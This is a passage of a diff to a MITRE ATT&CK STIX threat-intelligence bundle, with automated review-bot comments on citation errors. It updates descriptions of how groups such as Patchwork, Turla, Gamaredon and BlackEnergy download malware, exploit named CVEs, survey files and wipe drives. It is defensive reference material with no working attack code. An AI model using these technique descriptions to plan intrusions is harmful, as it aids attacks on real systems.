"created": "2017-05-31T21:33:27.021Z"
},
{
@@ -35138,7 +36166,7 @@
{
"id": "relationship--47f521b8-37e4-489d-b6eb-25f35de80aae",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) has downloaded additional code and files from servers onto victims.(Citation: Unit 42 Magic Hound Feb 2017)",
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) has downloaded additional code and files from servers onto victims.(Citation: Unit 42 Magic Hound Feb 2017) [Magic Hound](https://attack.mitre.org/groups/G0059) used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.(Citation: Check Point Rocket Kitten)(Citation: Check Point Rocket Kitten)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -35147,13 +36175,23 @@
"source_name": "Unit 42 Magic Hound Feb 2017",
"description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
+ },
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
+ },
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
}
],
"source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2019-09-09T19:21:42.183Z",
+ "modified": "2020-07-04T22:55:43.533Z",
"created": "2018-01-16T16:13:52.465Z"
},
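Review bot: The rewritten description at the top of this hunk ends with `(Citation: Check Point Rocket Kitten)(Citation: Check Point Rocket Kitten)`, and the external_references array now holds two byte-identical objects for that source (both entries added after the Unit 42 reference), which looks like a merge slip rather than intent. Consumers that index citations by source_name will mask the duplicate silently, so keep one copy of the reference object and close the description with a single `(Citation: Check Point Rocket Kitten)`. The Rocket Kitten relationship deleted earlier in this diff carried only that citation as its description, so this appears to be where it was folded in; confirm the tool link it expressed was meant to be dropped rather than moved.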
{
@@ -35300,7 +36338,7 @@
{
"id": "relationship--74316a28-d1a6-40b8-8c49-836f06e90e02",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Patchwork](https://attack.mitre.org/groups/G0040) uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, and CVE-2015-1641.(Citation: Cymmetria Patchwork)(Citation: Securelist Dropping Elephant)(Citation: Symantec Patchwork)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)",
+ "description": "[Patchwork](https://attack.mitre.org/groups/G0040) uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.(Citation: Cymmetria Patchwork)(Citation: Securelist Dropping Elephant)(Citation: Symantec Patchwork)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
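Review bot: The reworded description still contains the dangling phrase `deliver remote execution exploits as part of.` — the sentence has no object — and since this hunk already edits that string to add CVE-2017-11882, it is the place to fix it. Either complete the phrase from what the cited reports say or shorten it to `uses malicious documents to deliver remote execution exploits.`. The new CVE is inserted into an otherwise unsorted list, which STIX does not care about, so no reordering is needed.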
@@ -35321,26 +36359,31 @@
"source_name": "Symantec Patchwork"
},
{
- "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
+ "source_name": "PaloAlto Patchwork Mar 2018",
"description": "Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.",
- "source_name": "PaloAlto Patchwork Mar 2018"
+ "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"
},
{
- "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "source_name": "TrendMicro Patchwork Dec 2017",
"description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
- "source_name": "TrendMicro Patchwork Dec 2017"
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
},
{
- "source_name": "Volexity Patchwork June 2018",
+ "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
"description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
- "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
+ "source_name": "Volexity Patchwork June 2018"
+ },
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
}
],
"source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
"relationship_type": "uses",
"target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
"type": "relationship",
- "modified": "2020-03-19T19:58:57.951Z",
+ "modified": "2020-06-26T17:46:11.716Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -35682,7 +36725,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -35690,7 +36733,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.257Z",
+ "modified": "2020-06-22T17:54:15.482Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -35841,16 +36884,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.633Z",
+ "modified": "2020-06-02T16:14:00.331Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -36322,7 +37365,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -36331,7 +37374,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.139Z",
+ "modified": "2020-04-16T19:41:40.501Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -36390,16 +37433,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
"type": "relationship",
- "modified": "2020-03-17T00:28:01.549Z",
+ "modified": "2020-04-21T23:09:31.055Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -37077,16 +38120,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.018Z",
+ "modified": "2020-05-14T15:14:33.562Z",
"created": "2017-12-14T16:46:06.044Z"
},
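Review bot: The DustySky external reference on the new side has lost its `url` (the removed line pointed at `https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf`) and now carries only source_name and description, so the citation can no longer be resolved from the bundle. STIX 2.0 makes url optional on external references, but every other reference touched in this diff keeps one, and the same drop recurs in the second DustySky relationship later in the file. If the link was removed because it is dead, replacing it with an archived copy preserves provenance; if the removal was accidental, restore the `"url"` line.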
{
@@ -37302,7 +38344,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3",
"type": "relationship",
- "modified": "2020-02-05T14:15:23.266Z",
+ "modified": "2020-06-20T22:45:46.663Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -37356,16 +38398,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-03-19T19:21:27.669Z",
+ "modified": "2020-05-12T22:13:16.672Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -37820,7 +38862,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
"type": "relationship",
- "modified": "2019-07-25T12:33:12.873Z",
+ "modified": "2020-07-14T19:40:47.738Z",
"created": "2017-05-31T21:33:27.030Z"
},
{
@@ -38598,7 +39640,7 @@
{
"id": "relationship--c18652f6-e25c-4e01-bec2-04204a50cf23",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can delete all files on the C:\\, D:\\, E:\\ and, F:\\ drives using [PowerShell](https://attack.mitre.org/techniques/T1086) Remove-Item commands.(Citation: FireEye MuddyWater Mar 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can delete all files on the C:\\, D:\\, E:\\ and, F:\\ drives using [PowerShell](https://attack.mitre.org/techniques/T1059/001) Remove-Item commands.(Citation: FireEye MuddyWater Mar 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -38613,7 +39655,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2019-04-22T22:36:52.892Z",
+ "modified": "2020-03-31T22:21:47.653Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -39027,27 +40069,6 @@
"modified": "2019-08-20T13:08:13.416Z",
"created": "2017-05-31T21:33:27.036Z"
},
- {
- "id": "relationship--79d12bfb-6458-472f-85fc-4a8403956f9a",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[FIN7](https://attack.mitre.org/groups/G0046) created several .LNK files on the victim's machine.(Citation: FireEye FIN7 Aug 2018)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
- "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.",
- "source_name": "FireEye FIN7 Aug 2018"
- }
- ],
- "source_ref": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179",
- "type": "relationship",
- "modified": "2019-06-30T23:13:18.303Z",
- "created": "2018-10-17T00:14:20.652Z"
- },
{
"id": "relationship--1fda6ff7-a344-4bc3-b545-4083cc15290d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -39424,12 +40445,12 @@
"url": "http://research.zscaler.com/2015/08/chinese-cyber-espionage-apt-group.html"
}
],
- "source_ref": "malware--e066bf86-9cfb-407a-9d25-26fd5d91e360",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--e066bf86-9cfb-407a-9d25-26fd5d91e360",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--69f45e5e-2ebe-4cce-a4cd-e1db67bdff1a",
@@ -39445,12 +40466,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830"
},
{
"id": "relationship--c334b4c6-43f1-4452-8a1f-3d056fba9ac0",
@@ -39487,12 +40508,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--58f6b7ce-c0d0-4a54-b60d-1c39d6204796",
@@ -39779,22 +40800,27 @@
{
"id": "relationship--36112f24-7814-4c75-b5b7-a1205bb28b68",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.618Z",
+ "modified": "2020-06-22T17:55:32.020Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -40824,16 +41850,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.864Z",
+ "modified": "2020-05-12T22:13:16.669Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -40888,7 +41914,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
- "modified": "2020-03-14T18:19:14.980Z",
+ "modified": "2020-07-06T17:54:28.207Z",
"created": "2017-05-31T21:33:27.021Z"
},
{
@@ -40920,7 +41946,7 @@
{
"id": "relationship--fa6292a2-c184-4bc9-a37f-0c1ac61e1135",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, and in the Program Files directory.(Citation: Kaspersky Turla) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also searched for files matching the lPH*.dll pattern.(Citation: ESET Turla PowerShell May 2019)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also searched for files matching the lPH*.dll pattern.(Citation: ESET Turla PowerShell May 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
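Review bot: `the Program Files directory, and Recent.` leaves the last surveyed location ambiguous in the new description — it presumably refers to the user's Recent Items folder (`%APPDATA%\Microsoft\Windows\Recent`), but as written it reads as an unfinished list item. Suggest `the Program Files directory, and the user's Recent folder` or the exact wording used in the ESET ComRAT report, so a detection engineer can map it to a concrete path. Both citations are attached to that sentence together; if only the 2020 ESET report covers the Recent folder, placing the new citation directly after the new item would make that clear.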
@@ -40931,16 +41957,21 @@
"source_name": "Kaspersky Turla"
},
{
- "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.",
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "ESET Turla PowerShell May 2019",
"url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
- "source_name": "ESET Turla PowerShell May 2019"
+ "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019."
}
],
"source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2019-07-14T21:04:44.772Z",
+ "modified": "2020-06-29T03:33:39.232Z",
"created": "2017-05-31T21:33:27.045Z"
},
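Review bot: The re-added ESET Turla PowerShell reference keeps `Faou, M. and Dumont R..` (doubled period) on the new side, while other hunks in this same commit are explicitly normalizing `D..` to `D.` in citation descriptions. Since the line is being rewritten anyway, suggest `"description": "Faou, M. and Dumont, R. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019."` so the entry follows the convention being applied elsewhere in the file.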
{
@@ -41308,7 +42339,7 @@
{
"id": "relationship--d5166d3e-246b-473c-9ff0-c5cc97dd91de",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) 2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.(Citation: Securelist BlackEnergy Feb 2015)",
+ "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) 2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.(Citation: Securelist BlackEnergy Feb 2015)(Citation: ESET BlackEnergy Jan 2016)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -41317,13 +42348,18 @@
"source_name": "Securelist BlackEnergy Feb 2015",
"description": "Baumgartner, K. and Garnaeva, M.. (2015, February 17). BE2 extraordinary plugins, Siemens targeting, dev fails. Retrieved March 24, 2016.",
"url": "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/"
+ },
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/",
+ "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020."
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.628Z",
+ "modified": "2020-06-10T21:56:44.790Z",
"created": "2017-12-14T16:46:06.044Z"
},
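Review bot: The newly added ESET BlackEnergy reference description carries two punctuation slips — `Cherepanov, A..` (doubled period) and `electric industry . Retrieved` (space before the period) — at the same time this commit is cleaning up identical `D..` artifacts in existing citations. Suggest `"description": "Cherepanov, A. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved June 10, 2020."` so the new entry matches the normalized form.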
{
@@ -41517,12 +42553,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104"
},
{
"id": "relationship--74c1fa45-5ac3-47a0-a442-2cc5e89f7b4c",
@@ -41700,7 +42736,7 @@
{
"id": "relationship--2d840d1b-28d7-4387-86fd-6d3df8650171",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a tool to capture screenshots.(Citation: Secureworks BRONZE BUTLER Oct 2017)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a tool to capture screenshots.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -41709,13 +42745,18 @@
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2019-03-22T19:57:37.159Z",
+ "modified": "2020-06-24T01:27:31.923Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -41801,7 +42842,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -41809,7 +42850,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-03-19T19:43:24.336Z",
+ "modified": "2020-06-22T17:54:15.495Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -41878,22 +42919,27 @@
{
"id": "relationship--c839344c-a96d-412f-bded-5ac7c8fd446a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can download additional files.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can download additional files.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
